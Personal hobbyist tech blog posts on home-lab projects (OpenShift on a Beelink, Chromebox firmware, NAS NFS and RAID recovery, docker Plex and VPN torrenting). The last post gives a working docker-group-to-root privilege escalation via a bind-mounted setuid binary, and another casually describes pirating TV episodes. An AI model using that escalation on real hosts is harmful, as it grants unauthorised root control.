Installing single-node OpenShift (SNO) on a Beelink GTR5

After working on the HP Chromebox G1, I discovered that a single 32 GB DDR3 SODIMM was going to cost three times what the Chromebox itself cost me to begin with.  It quickly became evident my OpenShift experiment was going to be limited on the Chromebox, so I decided to try another PC I had available, a Beelink GTR5.  In addition to the internal SSD, I also added a 1 TB NVMe drive.

The Chromebox G1s might still be usable as a MicroShift cluster, but I'm waiting on parts to really determine if that's possible.

The GTR5 was previously used as a desktop machine running the i3 respin of Fedora.  First step was to back up everything, and then off to the races with OpenShift.

I started out following this guide:

https://www.redhat.com/sysadmin/low-cost-openshift-cluster

The installation followed the guide pretty closely, so I'm only going to note the special steps I did on my side.

I'm running a pretty simple consumer-grade router, but it let me configure the DHCP hostname.  I set the GTR5 to "hive.geolaw.loc" and used that in the cluster details:

Cluster Name: hive
Base Domain: geolaw.loc

I copied in my SSH public key and then generated the discovery ISO.

DNS entries: like I said, I've got a cheap consumer-class router that does not support adding DNS entries.
So on the machines where I plan on accessing the web GUI or using 'oc', I plan on just using the following /etc/hosts entries:

$ grep hive /etc/hosts
192.168.29.7 api.hive.geolaw.loc *.apps.hive.geolaw.loc api-int.hive.geolaw.loc
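One caveat here: the resolver does not actually expand wildcards in /etc/hosts, so the *.apps entry above gets matched literally rather than as a wildcard.  Any route hostname you actually browse to needs its own line; assuming the default route names, that means entries like:

192.168.29.7 console-openshift-console.apps.hive.geolaw.loc
192.168.29.7 oauth-openshift.apps.hive.geolaw.loc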

Booting the discovery.iso

I had an existing Ventoy USB drive, and I first tried just dropping the ISO file into the Ventoy partition.  That did not boot properly for me and dropped me into an emergency shell.  So I just used dd to write the discovery ISO to the thumb drive:
$ sudo dd if=discovery_image_hive.iso of=/dev/sdb bs=1024

Once this finished, I rebooted the GTR5 and selected the USB drive to boot from at the UEFI level.
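Side note: the write goes faster, and is easier to watch, with a bigger block size and GNU dd's progress flag, something like:

$ sudo dd if=discovery_image_hive.iso of=/dev/sdb bs=4M status=progress conv=fsync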

After booting, the agent.service was failing because it was unable to pull from the registry.redhat.io registry:

Jun 22 14:26:26 hive podman[17680]: Error: initializing source docker://registry.redhat.io/rhai-tech-preview/assisted-installer-agent-rhel8:v1.0.0-264: unable to retrieve auth token: invalid username/password: unauthorized: Please login to the Red Hat Registry using your Customer Portal credentials. Further instructions can be found here: https://access.redhat.com/articles/3399531
Jun 22 14:26:29 hive podman[17749]: Trying to pull registry.redhat.io/rhai-tech-preview/assisted-installer-agent-rhel8:v1.0.0-264…


To fix this I ssh'd into the OpenShift installer host, su'd to root, and then logged in to registry.redhat.io.  Once I logged in, I restarted the agent.service and away it went!


$ ssh core@hive
** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
This is a host being installed by the OpenShift Assisted Installer.
It will be installed from scratch during the installation.

The primary service is agent.service. To watch its status, run:
sudo journalctl -u agent.service

To view the agent log, run:
sudo journalctl TAG=agent
** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **
Last login: Thu Jun 22 14:26:22 2023 from 192.168.29.16
[core@hive ~]$ sudo su -
Last login: Thu Jun 22 14:17:22 UTC 2023 on pts/0
[root@hive ~]# podman login registry.redhat.io
Authenticating with existing credentials for registry.redhat.io
Existing credentials are invalid, please enter valid username and password
Username (|uhc-pool-81ec5a21-635b-4c43-8409-63e45c46ad51): glaw@redhat.com
Password:
Login Succeeded!
[root@hive ~]# systemctl restart agent

The discovered host eventually popped up in the assisted installer and I was able to select my network and continue the install.

The host rebooted several times along the way as it was processing the install.

Watching the console, I could see it pulling down the containers and starting them, but again I was getting registry errors, and the containers were going into an ImagePullBackOff state:

Jun 22 15:42:07 hive kubenswrapper[2978]: E0622 15:42:07.423504 2978 pod_workers.go:965] "Error syncing pod, skipping" err="failed to \"StartContainer\" for \"registry-server\" with ImagePullBackOff: \"Back-off pulling image \\\"registry.redhat.io/redhat/certified-operator-index:v4.13\\\"\"" pod="openshift-marketplace/certified-operators-bb2nx" podUID=0f76c0fa-cb11-436f-9e7e-77357117b313


I tried doing the podman login again, as root, as core, as containers .. no bueno 🙁
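One thing I want to try on the next attempt (untested on my side, so just a sketch): the cluster-wide pull secret lives in the openshift-config namespace, and refreshing it with a known-good registry.redhat.io login should propagate out to the nodes.  Assuming the auth file that podman login wrote is still around:

$ oc set data secret/pull-secret -n openshift-config \
    --from-file=.dockerconfigjson=${XDG_RUNTIME_DIR}/containers/auth.json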


Oh well, good first test, will have to retry later.

Adventures with HP Chromebox Pt1

In my daytime job, I support ODF and Ceph.

I recently picked up 3 refurbished HP Chromebox G1s for $49 each, with hopes of creating a mini local ODF cluster à la https://www.redhat.com/sysadmin/low-cost-openshift-cluster

https://www.amazon.com/gp/product/B00URW6WEY/

System specs:
CPU: Intel Core i7-4600U @ 2.10 GHz
RAM: 4 GB DDR3

First step was going to be installing Linux.
I started by following this guide:
https://rianoc.github.io/2020/04/19/Linux-Chromebox/ and then the links provided within.

1) First step was enabling "Developer mode", which links to https://wiki.galliumos.org/Installing/Panther#Enable_Developer_Mode_and_Boot_Flags

a) First boot after reset
This worked as described, except I was using a Logitech wireless keyboard/mouse combo, and the Ctrl-D from the wireless keyboard was not being accepted.  Having previously had issues with recovery on a Mac mini, which only saw wireless keyboards on the innermost rear USB port, I tried the dongle in both the front and back USB ports.  I had to pull out a wired USB keyboard, and Ctrl-D was accepted right away.

b) Trying to run "sudo crossystem dev_boot_legacy=1" from the terminal window.

Try as I might, sudo kept prompting me for a password, which went against almost every set of instructions I found: Ctrl-Alt-T for a terminal, "shell", then "sudo crossystem dev_boot_legacy=1".  On the first pass I had logged in using my Google ID; I have a G Suite (aka Google Apps) account for geolaw.com, and the device showed "this device is managed by geolaw.com", so I was not sure if that was blocking me from getting into sudo.  I rebooted, and when it prompted me that "OS verification is off", I turned it back on and repeated the developer-mode setup.

Second time around, after it reset and re-enabled developer mode:

At the "Welcome!" screen, I clicked "Enable debugging features".  From there it prompted me to set a root password; the first time around I set a password, the second time, no password.  I just clicked "Enable" and then "OK".  Back at the "Welcome!" screen, I clicked "Let's go >".  At "Connect to network", I clicked "Next" since I was connected via ethernet.  Google Chrome OS terms: "Accept and continue".  After a short "Checking for updates", it prompted me to "Sign in to your Chromebox".  I used "Browse as Guest" at the bottom, but was still unable to run "sudo crossystem dev_boot_legacy=1", as it kept prompting me for a password.

What finally worked was Ctrl-Alt-F2 (using the wired keyboard) and logging in as "root" with the password "test0000".  From there, I ran "crossystem dev_boot_legacy=1" (I was root, so no sudo needed).  I also ran "chromeos-setdevpasswd" to set the chronos password, since the next step also required sudo 🙂

Ctrl-Alt-F1 took me back to the GUI, where I still had the terminal window open:
cd;curl -LO https://mrchromebox.tech/firmware-util.sh && sudo bash firmware-util.sh

Note: the rianoc GitHub link above shows he used option 3, "3) Install/Update Full ROM Firmware".
When I ran this on June 16th, 2023, this was option 2.

DUH! I forgot to remove the write-protect screw to enable the firmware update.

After shutting down and removing the firmware write-protect screw, I rebooted.  Note: the firmware-util.sh file did not persist across the reboot (I was in a guest login, after all), so I fetched and ran the script again and chose "2".  It prompted me to back up the current stock firmware, which I did to a USB thumb drive; then it downloaded and flashed the new firmware to the device.

"R" to reboot, and immediately I could see the difference: the Google boot screen was replaced with a rabbit logo.  But there was no boot device: "Booting from 'SATA: LITEON IT LST-16S9G-HP ' failed: verify it contains a 64-bit UEFI OS."

Step 1 done, now to track down a CoreOS image for this device 🙂

Adding NFS to my Buffalo LinkStation

I bought a second-hand Buffalo LinkStation several years ago off eBay, and although it's not the most powerful NAS unit, it still serves the basic purpose of file sharing.  I also own a Lenovo ix2-dl, and the one complaint I have about the Buffalo unit is that there is no NFS built in.  Years ago I had hacked in some other firmware, but after having to reset the NAS, it defaulted back to the CIFS-only firmware.

  1. First step was to get in via ssh, done using the acp_commander Java code: https://advanxer.com/blog/2013/02/buffalo-linkstation-acp-commander-gui/
    1. After enabling ssh, I had to configure my .ssh/config like so to connect, due to the older ssh ciphers:
      Host buffalo-nas
        user root
        hostname 192.168.29.10
        KexAlgorithms diffie-hellman-group1-sha1
        PubkeyAcceptedKeyTypes +ssh-rsa
  2. Then I copied over my ssh keys:
    # ssh-copy-id root@buffalo-nas
  3. This stuff survives a reboot because the root home directory lives on /.  However, the ipkg package manager and the packages it installs live on /opt, which does not exist as part of the default OS, so as soon as the NAS reboots, it loses NFS every time.
  4. Next step: install ipkg.  The instructions from here worked fine
    (https://github.com/skx/Buffalo-220-NAS).
    Run the following to retrieve the list of available packages:
    # ipkg update
  5. From here, there are several NFS packages available.  Despite the note not to use it, unfs3 is what finally worked for me:
    # ipkg install unfs3
  6. Then configure NFS: create my exports file with my shares:
    # cat /opt/etc/exports
    /mnt/array1/Pictures 192.168.29.0(rw,sync)
    /mnt/array1/Music 192.168.29.0(rw,sync)
    /mnt/array1/storage 192.168.29.0(rw,sync)
    Then kill/restart nfs:
    # /opt/etc/init.d/S56unfsd
  7. Then I was able to see all the exports and mount them from my newer Fedora 35 and Ubuntu 21.10 machines:
    $ showmount -e buffalo-nas
    Export list for buffalo-nas:
    /mnt/array1/storage 192.168.29.0
    /mnt/array1/Music 192.168.29.0
    /mnt/array1/Pictures 192.168.29.0
  8. Add to /etc/fstab
    # cat /etc/fstab |grep Pictures
    192.168.29.10:/mnt/array1/Pictures /Pictures nfs defaults,noatime,vers=3 0 0
  9. And mount
    # sudo mount /Pictures


Alternately, after setting up ssh and ssh keys, I finally rewrote this whole process as an Ansible playbook [1].

The Python installed on the LinkStation is old (2.6) and does not have zlib, pip, or anything extra installed.  You can force Ansible not to use zlib with the following config option:

$ cat ansible.cfg
[defaults]
module_compression = 'ZIP_STORED'

$ cat hosts
[buffalo]
buffalo-nas

And then it's just a matter of running the playbook:

# ansible-playbook -v -v -v -i hosts buffalo.yml

The playbook is fairly well commented, with plenty of checks.
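Roughly, it boils down to something like this.  This is just a trimmed-down sketch rather than the real playbook [1]; the ipkg path and the task details are assumptions on my part, and the real thing also has to handle bootstrapping ipkg itself:

# sketch of buffalo.yml - raw tasks only, since the LinkStation python is too old for most modules
- hosts: buffalo
  gather_facts: no          # fact gathering needs a working python
  tasks:
    - name: see if unfs3 survived the last reboot
      raw: /opt/bin/ipkg list_installed | grep unfs3   # /opt/bin path is an assumption
      register: unfs3_check
      ignore_errors: yes

    - name: reinstall unfs3 if /opt got wiped
      raw: /opt/bin/ipkg update && /opt/bin/ipkg install unfs3
      when: unfs3_check.rc != 0

    - name: recreate the exports file
      raw: echo "/mnt/array1/Pictures 192.168.29.0(rw,sync)" > /opt/etc/exports

    - name: kick off nfs
      raw: /opt/etc/init.d/S56unfsd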

[1] Playbook: buffalo.yml



BitTorrent in a docker container with VPN

I cut the cord on cable years ago and have been relying on SABnzbd + Sickbeard/Sonarr to grab all of my TV shows off Usenet.  Occasionally Sickbeard/Sonarr will miss an episode, and by the time I go back to start looking for it, it is long gone from Usenet.  This leaves me either watching the show "on demand", which means commercials, or, once in a while, reaching out to The Pirate Bay to torrent a copy, which I usually try to avoid doing.

On the rare occasions I've had to do this in the past, the one time I forgot to check if my VPN was up and running, I got a nastygram in the mail from AT&T a few weeks later, because apparently HBO was monitoring the torrent downloaders 😉

Enter docker – https://github.com/haugene/docker-transmission-openvpn/

Turns out this was so easy I don’t know why I did not look at doing it before.

My docker-compose.yml file, straight from the GitHub except for the last line:

version: '3.3'
services:
  transmission-openvpn:
    cap_add:
      - NET_ADMIN
    volumes:
      - '/Downloads2/:/data'
    environment:
      - OPENVPN_PROVIDER=PIA
      - OPENVPN_CONFIG=ca_montreal,ca_ontario,ca_toronto,ca_vancouver
      - OPENVPN_USERNAME=XXXXX
      - OPENVPN_PASSWORD=XXXXX
      - LOCAL_NETWORK=192.168.0.0/16
      - PUID=1000
    logging:
      driver: json-file
      options:
        max-size: 10m
    ports:
      - '9091:9091'
    image: haugene/transmission-openvpn
    restart: unless-stopped

I added the last line to make sure this always auto-starts when the host machine reboots.

Coupled with a bash script to check the VPN, this works perfectly.  The script runs via cron every 10 minutes and makes sure the docker container's public IP is not the same as the host machine's IP (i.e., that the VPN is up and running):

#!/bin/bash

function check {
     # hack to make sure docker container is using VPN
     ATT_IP=$(curl -s http://ipinfo.io/ip);

     # transmission container
     TID=$(docker ps | grep trans | awk '{print $1}');
     # no -it here: docker exec can't allocate a TTY when run from cron
     TRANS_IP=$(docker exec $TID /bin/bash -c "curl -s http://ipinfo.io/ip")
}

check
i="0"
echo $ATT_IP
echo $TRANS_IP
while [ $i -lt 5 ]; do

     if [ "$ATT_IP" == "$TRANS_IP" ]; then
          echo "uh oh, docker running on ATT IP, restarting and retrying in 60 seconds"
          docker restart $TID
          i=$((i+1))
          sleep 60
          check
     else
          echo "we're good, docker running on VPN IP $TRANS_IP"
          exit;
     fi
done
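For reference, the cron entry is just this (the script path is wherever you saved it; mine below is only an example):

*/10 * * * * /home/glaw/bin/check_vpn.sh >> /tmp/check_vpn.log 2>&1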



Moving Plex to docker

I've been running plexmediaserver on my Linux rigs for several years now, but recently started moving several of my home media services over to docker images.

With a little help from this docker-compose yml: https://hub.docker.com/r/linuxserver/plex

I was able to do this fairly quickly and painlessly, with (nearly) zero downtime, while retaining all of my historical Plex data and keeping my libraries fully intact.  Hopefully this helps make my Plex setup more portable 🙂

My Plex setup has my TV shows on /TV/TV/ and my movies on /TV/Movies; these are both on an NFS share coming off my QNAP NAS.  Files are all owned by my user "glaw" (UID 1000) and group "users" (GID 100).

First step was to prep the docker-compose file:

$ cat docker-compose.yml

version: "2.1"
services:
  plex:
    image: ghcr.io/linuxserver/plex
    container_name: plex
    network_mode: host
    environment:
      - PUID=1000
      - PGID=100
      - VERSION=docker
      - PLEX_CLAIM=claim-SyGiy3XXXXXXXXXX
    volumes:
      - /var/lib/plexmediaserver:/config
      - /TV/TV:/TV/TV
      - /TV/Movies:/TV/Movies
    restart: unless-stopped

Since my media lives in subdirectories under /TV (capitalized), I adjusted the volumes to reflect the capitalization.  The first time around, with /tv and /movies, none of my media would play.

I got the PLEX_CLAIM token from https://plex.tv/claim just before I did the docker-compose up below; the claim token is only good for 4 minutes.

Second, I stopped and disabled plexmediaserver on my main Linux rig (SS is an alias for sudo systemctl):

# SS stop plexmediaserver
# SS disable plexmediaserver

Third, make a backup copy of all of my Plex data and then chown it so it matches the PUID/PGID in the docker container:

# sudo cp -r /var/lib/plexmediaserver /var/lib/plexmediaserver.sav
# sudo chown -R glaw:users /var/lib/plexmediaserver

Next I brought up the docker image.  The first time, it pulled down all of the docker layers and then started up Plex.  Each additional time, it just recreates the same container, since all of the layers are already present.

# docker-compose up

Pulling plex (ghcr.io/linuxserver/plex:)…
latest: Pulling from linuxserver/plex
1f5e15c78208: Pull complete
a8bf534b5e6e: Pull complete
e633a0fa06b1: Pull complete
e26072cac69d: Pull complete
57c07b9b6c59: Pull complete
b2d9d0061554: Pull complete
ec31a11d59ba: Pull complete
43c725c27329: Pull complete
Digest: sha256:f92f4238cd7bc72ba576f22571ddc05461a2467bc0a1a5dd41864db7064d6fa6
Status: Downloaded newer image for ghcr.io/linuxserver/plex:latest
Creating plex … done
Attaching to plex
plex | [s6-init] making user provided files available at /var/run/s6/etc…exited 0.
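Running docker-compose up attached like this is handy for the first start; after that, you can Ctrl-C it and bring it back up detached so it isn't tied to your terminal:

# docker-compose up -d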

Lastly, I rebooted the host machine and verified all docker containers were running:

# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
1760b65b5108 haugene/transmission-openvpn "dumb-init /etc/open?" About a minute ago Up 57 seconds (health: starting) 0.0.0.0:9091->9091/tcp transmission_transmission-openvpn_1
1f35aae81c73 ghcr.io/linuxserver/plex "/init" 24 minutes ago Up 2 minutes plex
c165f0c9d947 ghcr.io/linuxserver/jackett "/init" 24 hours ago Up 2 minutes 0.0.0.0:9117->9117/tcp jackett

The final test was to turn off wifi on my cell phone and verify I could still get to my home plex just as if plexmediaserver were still running natively on the host machine.

Lenovo ix2-dl corrupted firmware

What a pain in the $%^&*( ass.

Lenovo has no concept of using an md5 checksum on a file to confirm its integrity before you flash it, which is how you end up with a corrupted NAS like me.

AND to top it off, Lenovo support only offers a destructive way to reflash the NAS, double %^&*()^& in the ass.

So initially I thought the drives were set up as a ZFS disk set; I installed the needed ZFS debs on my Debian Jessie system, only to find out that the Lenovo disk set is just a Linux md RAID set.  So (pulling this from my bash history):

Disk /dev/sdd: 1.8 TiB, 2000398934016 bytes, 3907029168 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 4096 bytes
I/O size (minimum/optimal): 4096 bytes / 4096 bytes
Disklabel type: gpt
Disk identifier: 276C4C51-BFA8-4E33-AB51-FC7033AA6D56

Device Start End Sectors Size Type
/dev/sdd1 65536 42008575 41943040 20G Microsoft basic data
/dev/sdd2 42008576 3907028991 3865020416 1.8T Microsoft basic data

Once I figured out it was just a Linux md RAID set, it was easy peasy to import:

root@dell:~# mdadm --assemble --run /dev/md1 /dev/sdd2
mdadm: /dev/md1 has been started with 1 drive (out of 2).

# DOH! no lvm2 installed on the system
root@dell:~# mount /dev/md1 /mnt
mount: unknown filesystem type 'LVM2_member'
root@dell:~# pvscan
-su: pvscan: command not found
root@dell:~# apt-get install lvm2

pvscan, vgscan, and lvscan brought the LV into device-mapper:

root@dell:~# pvscan
PV /dev/md1 VG bad2c48_vg lvm2 [1.80 TiB / 0 free]
Total: 1 [1.80 TiB] / in use: 1 [1.80 TiB] / in no VG: 0 [0 ]
root@dell:~# vgscan
Reading all physical volumes. This may take a while…
Found volume group "bad2c48_vg" using metadata type lvm2
root@dell:~# lvscan
ACTIVE '/dev/bad2c48_vg/lv3140cc7e' [1.80 TiB] inherit

Mounted it up:
root@dell:~# sudo mount /dev/bad2c48_vg/lv3140cc7e /mnt

Bingo.  Now I just need to find 1.8 TB worth of space elsewhere to rsync all that %^&*( data off to,
so I can follow Lenovo's destructive NAS rebuild.
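The copy itself is nothing fancy, just an rsync from the mounted LV to wherever the free space lives (the destination path here is made up):

root@dell:~# rsync -avP /mnt/ /mnt2/ix2-backup/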

—————————————————————–
Update 07/01/2017
I got an email from a guy who had a 4-drive Lenovo PX4-300R NAS with a RAID 5 array set up.
He also had very little experience with Linux.

This is the rough process that worked for him

1. First, download Ubuntu (http://ubuntu.com) and get it onto a USB drive or CD: https://wiki.ubuntu.com/Win32DiskImager/iso2usb

2. Pull your drives from the NAS one at a time.  I am not sure if there is anything that designates the first disk, second disk, etc.; I think it's left to right in mine, if I remember correctly, but make sure to label them.

3. Prepare the PC you will be booting from: connect the 4 SATA cables/drives in order, or at least a first guess at the order, and boot up to the flash drive.  Note: if you are playing with a UEFI machine, you may need to disable secure boot.  Ubuntu will start automatically and should pop up asking if you want to try or install; click "Try".
4. Right-click on the desktop and open a terminal.  Commands below are prefixed by # or $ for readability; don't type the # or $.
ubuntu@ubuntu:~$ sudo su -
5. Get a list of the disks:
     root@ubuntu:~# fdisk -l
You should see your 4 identical disks; they should be obvious based on their size:

I had 2 x 1.8 TB drives set up in a RAID 1, and since the disks are complete mirrors of each other, I could access the data with just a single disk.

My disk in question showed up like this :

Disk /dev/sdd: 1.8 TiB, 2000398934016 bytes, 3907029168 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 4096 bytes
I/O size (minimum/optimal): 4096 bytes / 4096 bytes
Disklabel type: gpt
Disk identifier: 276C4C51-BFA8-4E33-AB51-FC7033AA6D56

Device Start End Sectors Size Type
/dev/sdd1 65536 42008575 41943040 20G Microsoft basic data
/dev/sdd2 42008576 3907028991 3865020416 1.8T Microsoft basic data

Make a note of the devices that correlate to your NAS drives.  Your first disk may be /dev/sda (it could be your Windows disk if you leave your Windows drive connected), the second /dev/sdb, then /dev/sdc, /dev/sdd, etc.  The USB drive might also show up as a /dev/sd* device.

6. This guy reported back to me that mdadm was not included on the default Ubuntu live CD, so install it:

# apt install mdadm
7. Assemble the RAID.  Using /dev/sdd from my blog above: /dev/sdd1 is, I'm guessing, something specific to the Lenovo setup; /dev/sdd2 is where the data lives.
So once you identify your drives (for example, here I will assume /dev/sdb, /dev/sdc, /dev/sdd, and /dev/sde), you should see the same 2 partitions as /dev/sdd1 and /dev/sdd2 above on each: /dev/sdb1 and /dev/sdb2, /dev/sdc1 and /dev/sdc2, /dev/sdd1 and /dev/sdd2, /dev/sde1 and /dev/sde2.

The "2" partitions should all be used in the Linux md array, so something like this:

root@ubuntu:~# mdadm --assemble --run /dev/md1 /dev/sdb2 /dev/sdc2 /dev/sdd2 /dev/sde2

If this works, you should get something like:

mdadm: /dev/md1 has been started with 4 drives.

8. If not, the disks may be in the wrong order.  You *may* be able to just tweak the command and give them in reverse order:

root@ubuntu:~# mdadm --assemble --run /dev/md1 /dev/sde2 /dev/sdd2 /dev/sdc2 /dev/sdb2
You want to shoot for the "mdadm: /dev/md1 has been started…" output.
If you can get there, you should be able to use the following to scan in the logical volume(s) off the RAID 5.
9. Load in the lvols:
root@dell:~# pvscan
PV /dev/md1 VG bad2c48_vg lvm2 [1.80 TiB / 0 free]
Total: 1 [1.80 TiB] / in use: 1 [1.80 TiB] / in no VG: 0 [0 ]
root@dell:~# vgscan
Reading all physical volumes. This may take a while…
Found volume group "bad2c48_vg" using metadata type lvm2
root@dell:~# lvscan
ACTIVE '/dev/bad2c48_vg/lv3140cc7e' [1.80 TiB] inherit
^^^^^^^^^^^^^^^^^^^^^^^^^^^ – this is your logical volume name
You could realistically get multiple volume groups and logical volumes, depending on how the NAS slices up the array.
Mount it up; -o ro mounts it read-only, so you're not changing anything on it, just copying off:
root@dell:~# mount -o ro /dev/bad2c48_vg/lv3140cc7e /mnt
Then you can use this command to list your files:
root@ubuntu:~# ls -la /mnt
10. From here he was able to plug in another USB drive to recover his data to, then, using the "Files" icon on the sidebar, copy from /mnt to the USB drive.
Update – 2022
Shut down my LinkStation today, but used this same concept to add the first disk into a Linux machine, then rsync data from another, smaller md RAID array with a failed disk over to the 3 TB disk.  Then, hopefully, I can stop the first md RAID, insert the second disk, and ??? hopefully bring up the new md array.

Updating a Raspberry Pi 2 boot disk to a Raspberry Pi 3

This is just the real basics as I figured them out, and a work in progress.  I have not yet figured out which wireless network driver needs to be added to a Pi 2 image to make it see the Pi 3's embedded wireless, but using wired ethernet this at least gives me the option to capture some code off a distributed Pi 2 image so it can be dropped onto a fresh install of 2016-05-27-raspbian-jessie.

So in this example, I am using the ProxyMagic image for a Raspberry Pi 2 and want to drop the code onto a newer Pi 3 Raspbian image.

  1. Download the latest Raspbian image.  I am using the Debian Jessie version dated May 27th, 2016 from https://www.raspberrypi.org/downloads/raspbian/
  2. Unpack the .zip to get the .img file, 2016-05-27-raspbian-jessie.img
  3. View the disk contents.  This shows 2 partitions: the 63 MB MS-DOS boot partition and the 3.7 GB Linux partition:
    $> fdisk -lu 2016-05-27-raspbian-jessie.img

    Disk 2016-05-27-raspbian-jessie.img: 3.8 GiB, 4019191808 bytes, 7849984 sectors 
    Units: sectors of 1 * 512 = 512 bytes 
    Sector size (logical/physical): 512 bytes / 512 bytes 
    I/O size (minimum/optimal): 512 bytes / 512 bytes 
    Disklabel type: dos 
    Disk identifier: 0x14c20151 
    Device                          Boot  Start     End   Sectors  Size Id   Type 
    2016-05-27-raspbian-jessie.img1        8192  137215    129024   63M  c    W95 FAT32 (LBA)
    2016-05-27-raspbian-jessie.img2      137216 7849983   7712768  3.7G 83    Linux
    
  4. Copy this off to an 8 GB microSD card.  My SD card came in as /dev/sdd; you can check your dmesg output after inserting your card to get the device.
    $> sudo dd if=2016-05-27-raspbian-jessie.img of=/dev/sdd
  5. As soon as the dd completes, my Linux file manager (nemo) refreshed with the "boot" partition and a 3.7 GB volume.  I can click on each to mount them in userspace, i.e. they mount as /media/glaw/boot and /media/glaw/<some big long UUID>.
  6. In a terminal window, I cd'd to the SD card's ext4 mount and wiped everything out:
    $> cd /media/glaw/fc254b57-8fff-4f96-9609-ea202d871acf
    $> sudo rm -rf *
    $> sudo sync
  7. Now to mount up the ProxyMagic image to copy the files over.  I've read about how you can calculate the byte offset from the partition's start sector and sector size and then specify that offset when doing a loopback mount (the math is sketched after this list), but found that kpartx does the trick very well:
    $> kpartx -v -a ProxyMagic-RPI-v1.img
    add map loop2p1 (253:0): 0 114688 linear /dev/loop2 8192
    add map loop2p2 (253:1): 0 5662720 linear /dev/loop2 122880
  8. Up pops an authentication window asking for sudo rights to mount the new boot file system.  It should mount as /media/glaw/boot1; then click on the 2.9 GB volume to mount it.
  9. Locate the other
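For the curious, the loopback offset math mentioned in step 7 is just the partition's start sector times the 512-byte sector size.  From the kpartx output above, the second (Linux) partition of the ProxyMagic image starts at sector 122880, so mounting it directly should look something like this:

    $> sudo mount -o loop,offset=$((122880 * 512)) ProxyMagic-RPI-v1.img /mnt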

Sofa pictures

As shown, it looks like there is a gap in the back, but the 2 main sections were not "joined" in these pictures.  There is a metal brace that slides into the bottom of the sections to join them; there is no gap when it's fully assembled.

Looking at the sofa: front left corner, where the cats have scratched it.

The whole thing assembled takes up about 9 ft x 9 ft; the 2 main pieces are about 7.5 ft x 3 ft x 3 ft.

Back left corner, also some cat scratches.

Right back corner.  Didn't realize it came out this blurry; similar to the other back corner.

Front right arm.

Not sure what the stain is from; there are a couple other small stains here and there.

Center cushion.  I do not believe the marks are stains, just from something sitting on the cushion while it was stored in the garage.

Open Sourcing my Hackintosh ;)

Running an HP SPP mini tower with Yosemite installed, and finally getting tired of Finder and iTerm.  Don't get me wrong, I like iTerm, but from my Linux background, my fingers just know terminator so much better 🙂

I tried installing terminator via brew, but it did not seem very stable: I opened up a 4-up terminator view, and after the icon spun for 5 minutes, it crashed.

Fink seems to be much more stable and integrates its programs right into XQuartz, where the brew-installed version popped up a separate Python window.

1. Install Fink.  A bash script to do it all for ya: https://raw.githubusercontent.com/fink/scripts/master/srcinstaller/Install%20Fink.tool

2. fink install terminator

3. fink install nautilus

4. Set up dbus for OS X:

sudo launchctl load -w /sw/share/dbus/launchd/org.finkproject.dbus-session.plist

launchctl load -w /sw/share/dbus/launchd/org.finkproject.dbus-session.plist



Serious docker root exploit

I was amazed at how easy this was.  I found a couple different websites that led me to this; giving credit where credit is due:

1. http://yatb.giacomodrago.com/en/post/10/shutdown-linux-system-from-within-php-script.html

2. http://reventlov.com/advisories/using-the-docker-command-to-root-the-host

So, putting 1 and 2 together: I have my docker install running as the "docker" user, so no sudo required.  All I did (as docker) was:

1. Create the following snippet of C code, shutdown_setuid.c:
docker $> vi shutdown_setuid.c
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);  /* we're euid 0 thanks to the setuid bit; become root for real */
    system("/sbin/shutdown -h now"); /* change this to the actual location of shutdown */
    return 0;
}

2. Compile it:
docker $> gcc -o shutdown_setuid shutdown_setuid.c

3. Exploit docker to bind-mount the current directory, then chown shutdown_setuid to root and turn on the setuid permission bits:
docker $> docker run -v $PWD:/stuff -t dockerdev/rhel /bin/bash -c 'chown root.root /stuff/shutdown_setuid && chmod a+s /stuff/shutdown_setuid'

4. Verify the result:
docker $> ls -la shutdown_setuid
-rwsrwsr-x. 1 root root 6623 May 29 11:54 shutdown_setuid
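And that's the whole exploit.  With the setuid bit in place, any account on the host that can execute the binary, not just docker, can now power the machine off with no sudo involved:

docker $> ./shutdown_setuid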